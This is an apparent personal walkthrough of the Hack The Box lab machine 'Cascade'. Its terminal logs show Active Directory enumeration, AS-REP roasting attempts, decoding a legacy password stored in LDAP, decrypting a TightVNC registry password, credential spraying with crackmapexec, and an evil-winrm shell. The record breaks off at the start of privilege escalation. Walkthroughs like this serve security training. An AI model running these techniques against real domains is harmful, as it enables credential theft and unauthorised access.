Cascade

This is a windows machine from hack the box.

Nmap scan

└─$ nmap -sV -sC -oA cascade 10.10.10.182
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 05:46 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.97 seconds
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ nmap -sV -sC -oA cascade 10.10.10.182 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 05:47 EDT
Nmap scan report for 10.10.10.182
Host is up (0.38s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT      STATE SERVICE           VERSION
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2023-09-11 09:48:13Z)
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
636/tcp   open  tcpwrapped
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
49154/tcp open  msrpc             Microsoft Windows RPC
49155/tcp open  msrpc             Microsoft Windows RPC
49157/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.22 seconds
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ 

crackmapexec

└─$ crackmapexec smb  10.10.10.182  -u "" up ""
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec smb 10.10.10.182 --shares     
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]

rpcclient

Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ 

add the cascade.local to hosts file

  GNU nano 7.2                                          /etc/hosts *                                                 
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local

Do an ldap search

kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
CascGuest
CASC-DC1$
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
kali@kali ~/H/cascade> 

output the users to a text file and include administrator

administrator
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
kali@kali ~/H/cascade> 

use kerbrute to see which users are valid. They are all valid

kali@kali ~/H/cascade> ./kerbrute userenum --dc 10.10.10.182 -d  cascade.LOCAL users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/11/23 - Ronnie Flathers @ropnop

2023/09/11 06:36:48 >  Using KDC(s):
2023/09/11 06:36:48 >   10.10.10.182:88

2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:36:57 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:37:03 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:37:03 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:37:04 >  [+] VALID USERNAME:       [email protected]
2023/09/11 06:37:04 >  Done! Tested 15 usernames (12 valid) in 15.881 seconds
kali@kali ~/H/cascade> 

We loop this filre and checke which we can get the hash but we get nothing

```bash
└─$ while read -r user; do
    ./GetNPUsers.py cascade.LOCAL/$user -no-pass -dc-ip 10.10.10.182
done < /home/kali/HTB/cascade/users.txt

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for arksvc
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for s.smith
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for r.thompson
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for util
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for j.wakefield
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for s.hickson
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for j.goodhand
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for a.turnbull
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for e.crowe
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for b.hanson
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for d.burman
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for BackupSvc
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for j.allen
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for i.croft
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)

enume4linux gives nothing

kali@kali ~/H/cascade> enum4linux  -S 10.10.10.182
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 11 06:45:06 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.182
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.182 )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on 10.10.10.182 )===================================


[+] Server 10.10.10.182 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.10.182 )================================

Domain Name: CASCADE
Domain Sid: S-1-5-21-3332504370-1206983947-1165150453

[+] Host is part of a domain (not a workgroup)


 =================================( Share Enumeration on 10.10.10.182 )=================================

do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.182

enum4linux complete on Mon Sep 11 06:45:30 2023

kali@kali ~/H/cascade> 

Tried this

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.182 -request 'cascade.local/'
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!
                                                                                                        
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 

We going to try and brute force to get password

checking password policy


└─$ crackmapexec smb 10.10.10.182 --pass-pol

SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] Dumping password info for domain: CASCADE
SMB         10.10.10.182    445    CASC-DC1         Minimum password length: 5
SMB         10.10.10.182    445    CASC-DC1         Password history length: None
SMB         10.10.10.182    445    CASC-DC1         Maximum password age: Not Set
SMB         10.10.10.182    445    CASC-DC1         
SMB         10.10.10.182    445    CASC-DC1         Password Complexity Flags: 000000
SMB         10.10.10.182    445    CASC-DC1             Domain Refuse Password Change: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password Store Cleartext: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password Lockout Admins: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password No Clear Change: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password No Anon Change: 0
SMB         10.10.10.182    445    CASC-DC1             Domain Password Complex: 0
SMB         10.10.10.182    445    CASC-DC1         
SMB         10.10.10.182    445    CASC-DC1         Minimum password age: None
SMB         10.10.10.182    445    CASC-DC1         Reset Account Lockout Counter: 30 minutes 
SMB         10.10.10.182    445    CASC-DC1         Locked Account Duration: 30 minutes 
SMB         10.10.10.182    445    CASC-DC1         Account Lockout Threshold: None
SMB         10.10.10.182    445    CASC-DC1         Forced Log off Time: Not Set
                                                                                                        
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ 


— SMB 10.10.10.182 445 CASC-DC1 Account Lockout Threshold: None

Brute forcing will require us creating a short list

Going back to ldap search

ldap search listing all objects —

kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr

   1109 dSCorePropagationData:
    518 objectClass:
    263 #
    254 
    249 dn:
    226 whenCreated:
    226 whenChanged:
    226 uSNCreated:
    226 uSNChanged:
    226 objectGUID::
    226 objectCategory:

Found custom object called — cascadeLegacyPwd

   1 C-DC1,OU=Domain
      1 cascadeLegacyPwd:

Doing an Ldapsearch to get username and this custom object

kali@kali ~/H/cascade> ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub '(objectClass=person)' sAMAccountName cascadeLegacyPwd | awk -F ': ' '/sAMAccountName/ { username=$2 } /cascadeLegacyPwd/ { print username ": " $2 }'
sAMAccountName cascadeLegacyPwd : sAMAccountName cascadeLegacyPwd 
r.thompson: clk0bjVldmE=
kali@kali ~/H/cascade> 

This seems to be base64 since it has the = at the end

Decoding this with use of chatGPT we get clk4n5eva and the command to decode this is “echo “clk0bjVldmE=” | base64 -d. actually chatGPT was wrong

kali@kali ~/H/cascade> echo "clk0bjVldmE=" | base64 -d
rY4n5eva⏎                                                                                         kali@kali ~/H/cascade> 

we try crackmapexec

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p clk4n5eva       
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\r.thompson:clk4n5eva
                                                                                                                          
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec winrm 10.10.10.182 -u r.thompson -p rY4n5eva 
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [-] cascade.local\r.thompson:rY4n5eva
                                                                                                                          
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva 
SMB         10.10.10.182    445    CASC-DC1         [+] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$                          
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ            
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share 
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share 
                                                                                                                          
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

we read the data folder after connecting with smbclient and get some files

└─$ smbclient //10.10.10.182/data -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020
cd 
                6553343 blocks of size 4096. 1624901 blocks available
smb: \> cd Contractors
smb: \Contractors\> ls
NT_STATUS_ACCESS_DENIED listing \Contractors\*
smb: \Contractors\> cd ../
smb: \> cd Finance
smb: \Finance\> ls
NT_STATUS_ACCESS_DENIED listing \Finance\*
smb: \Finance\> cd ../
smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Tue Jan 28 13:04:51 2020
  ..                                  D        0  Tue Jan 28 13:04:51 2020
  Email Archives                      D        0  Tue Jan 28 13:00:30 2020
  LogonAudit                          D        0  Tue Jan 28 13:04:40 2020
  Logs                                D        0  Tue Jan 28 19:53:04 2020
  Temp                                D        0  Tue Jan 28 17:06:59 2020

                6553343 blocks of size 4096. 1624901 blocks available
smb: \IT\> get Email Archives
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Email
smb: \IT\> cd Email Archives
cd \IT\Email\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\> get LogonAudit
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \IT\LogonAudit
smb: \IT\> cd LogonAudit
smb: \IT\LogonAudit\> ls
  .                                   D        0  Tue Jan 28 13:04:40 2020
  ..                                  D        0  Tue Jan 28 13:04:40 2020

                6553343 blocks of size 4096. 1624642 blocks available
smb: \IT\LogonAudit\> cd ../
smb: \IT\> cd Logs
smb: \IT\Logs\> ls
  .                                   D        0  Tue Jan 28 19:53:04 2020
  ..                                  D        0  Tue Jan 28 19:53:04 2020
  Ark AD Recycle Bin                  D        0  Fri Jan 10 11:33:45 2020
  DCs                                 D        0  Tue Jan 28 19:56:00 2020

                6553343 blocks of size 4096. 1624642 blocks available
smb: \IT\Logs\> cd Ark AD Recycle Bin
cd \IT\Logs\Ark\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \IT\Logs\> cd "Ark AD Recycle Bin"
smb: \IT\Logs\Ark AD Recycle Bin\> ls
  .                                   D        0  Fri Jan 10 11:33:45 2020
  ..                                  D        0  Fri Jan 10 11:33:45 2020
  ArkAdRecycleBin.log                 A     1303  Tue Jan 28 20:19:11 2020

                6553343 blocks of size 4096. 1624900 blocks available
smb: \IT\Logs\Ark AD Recycle Bin\> get ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \IT\Logs\Ark AD Recycle Bin\> cd ../
smb: \IT\Logs\> cd ../
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
  .                                   D        0  Tue Jan 28 13:00:30 2020
  ..                                  D        0  Tue Jan 28 13:00:30 2020
  Meeting_Notes_June_2018.html       An     2522  Tue Jan 28 13:00:12 2020

                6553343 blocks of size 4096. 1624900 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (1.5 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \IT\Email Archives\> 

reading the contet of the email

└─$ cat Meeting_Notes_June_2018.html
<html>
<body lang=EN-GB link=blue vlink=purple style='tab-interval:36.0pt'>

<div class=WordSection1>

<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>From:<span style='mso-tab-count:
1'>���������������������������������������� </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Steve Smith
<o:p></o:p></span></p>

<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>To:<span style='mso-tab-count:
1'>���������������������������������������������� </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>IT (Internal)<o:p></o:p></span></p>

<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Sent:<span style='mso-tab-count:
1'>������������������������������������������ </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>14 June 2018 14:07<o:p></o:p></span></p>


<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Subject:<span
style='mso-tab-count:1'>������������������������������������ </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Meeting Notes<o:p></o:p></span></p>

<p><o:p>&nbsp;</o:p></p>

<p>For anyone that missed yesterday�s meeting (I�m looking at
you Ben). Main points are below:</p>

<p class=MsoNormal><o:p>&nbsp;</o:p></p>

<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>

<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>

<p>-- The winner of the �Best GPO� competition will be
announced on Friday so get your submissions in soon.</p>

<p class=MsoNormal><o:p>&nbsp;</o:p></p>

<p class=MsoNormal>Steve</p>


</div>

</body>

</html>

We see username TempAdmin

try get a hash but no luck.also tried with user Ben

kali@kali ~/H/cascade> cd /usr/share/doc/python3-impacket/examples
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/TempAdmin
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate TempAdmin, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/S.smith
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate S.smith, getting its TGT
[-] User S.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
kali@kali /u/s/d/p/examples> ./GetNPUsers.py cascade.LOCAL/Ben
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate Ben, getting its TGT
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
kali@kali /u/s/d/p/examples> 

We also look at the VNC file that we got from one of the folders

smb: \> ls
  .                                   D        0  Sun Jan 26 22:27:34 2020
  ..                                  D        0  Sun Jan 26 22:27:34 2020
  Contractors                         D        0  Sun Jan 12 20:45:11 2020
  Finance                             D        0  Sun Jan 12 20:45:06 2020
  IT                                  D        0  Tue Jan 28 13:04:51 2020
  Production                          D        0  Sun Jan 12 20:45:18 2020
  Temps                               D        0  Sun Jan 12 20:45:15 2020
cd 
                6553343 blocks of size 4096. 1624895 blocks available
smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Tue Jan 28 13:04:51 2020
  ..                                  D        0  Tue Jan 28 13:04:51 2020
  Email Archives                      D        0  Tue Jan 28 13:00:30 2020
  LogonAudit                          D        0  Tue Jan 28 13:04:40 2020
  Logs                                D        0  Tue Jan 28 19:53:04 2020
  Temp                                D        0  Tue Jan 28 17:06:59 2020
cd 
                6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\> cd Temp
smb: \IT\Temp\> ls
  .                                   D        0  Tue Jan 28 17:06:59 2020
  ..                                  D        0  Tue Jan 28 17:06:59 2020
  r.thompson                          D        0  Tue Jan 28 17:06:53 2020
  s.smith                             D        0  Tue Jan 28 15:00:01 2020

                6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\Temp\> cd s.smith
smb: \IT\Temp\s.smith\> ls
  .                                   D        0  Tue Jan 28 15:00:01 2020
  ..                                  D        0  Tue Jan 28 15:00:01 2020
  VNC Install.reg                     A     2680  Tue Jan 28 14:27:44 2020

                6553343 blocks of size 4096. 1624895 blocks available
smb: \IT\Temp\s.smith\> get VNC Install.reg 
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \IT\Temp\s.smith\VNC
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \IT\Temp\s.smith\> 

thhe VNC file

└─$ cat VNC\ Install.reg            
��Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""

                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade]
└─$ 

ChatGPT gives this as asci – kÏ*KnZÊ which doesnt look like a password

From chatGPT

The value you provided seems to be from a registry key associated with TightVNC. TightVNC stores its passwords in the Windows Registry, and they're saved in a hashed (obfuscated) form, not plain text.

Given `"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f`, this looks like the registry entry for the TightVNC password. The hexadecimal value isn't the password itself but rather an encoded or hashed representation of it.

To get the actual password, you would typically need to decode or decrypt the hash, which requires specialized tools or scripts. There have been a few tools and scripts written for this purpose over the years. One of the well-known tools for this is `vncpwd`, which can decrypt VNC passwords stored in this way.

If you have access to the tool, you can use the extracted hex values to retrieve the password. Otherwise, there are also scripts available online in various programming languages that accomplish the same thing.

Keep in mind that interpreting or accessing information without proper authorization is illegal and unethical. Always make sure to have the necessary permissions when working with sensitive data or systems.

Got a decrypter — https://github.com/jeroennijhof/vncpwd

Afer running the tool, i was getting bad output

┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ ./vncpwd vnc_hash.txt                                

Password: (�����
                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ 

Checking with chatGPT , it recommended the process

echo -n "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_hash.bin
./vncpwd vnc_hash.bin

and we get the password

┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ echo -n "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_hash.bin

                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ ./vncpwd vnc_hash.bin                                

Password: sT333ve2
                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ 

run crackmapexec

┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]

using evil-winrm and we get the hash – 795b883bce48e25112c2183f92466

┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p  sT333ve2
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p   sT333ve2
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\s.smith\Desktop> ls


    Directory: C:\Users\s.smith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/11/2023  10:47 AM             34 user.txt
-a----         2/4/2021   4:24 PM           1031 WinDirStat.lnk


*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat users.txt
Cannot find path 'C:\Users\s.smith\Desktop\users.txt' because it does not exist.
At line:1 char:1
+ cat users.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\s.smith\Desktop\users.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat user.txt
795b883bce48e25112c2183f92466

Privesc

copy sharphound to cascade folder

┌──(kali㉿kali)-[~/Downloads]
└─$ cd Bloodhound_3
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ ls
 BloodHound-3.0.5   BloodHound-3.0.5.zip   BloodHound-linux-x64  'BloodHound-linux-x64(1).zip'
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-3.0.5
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ ls
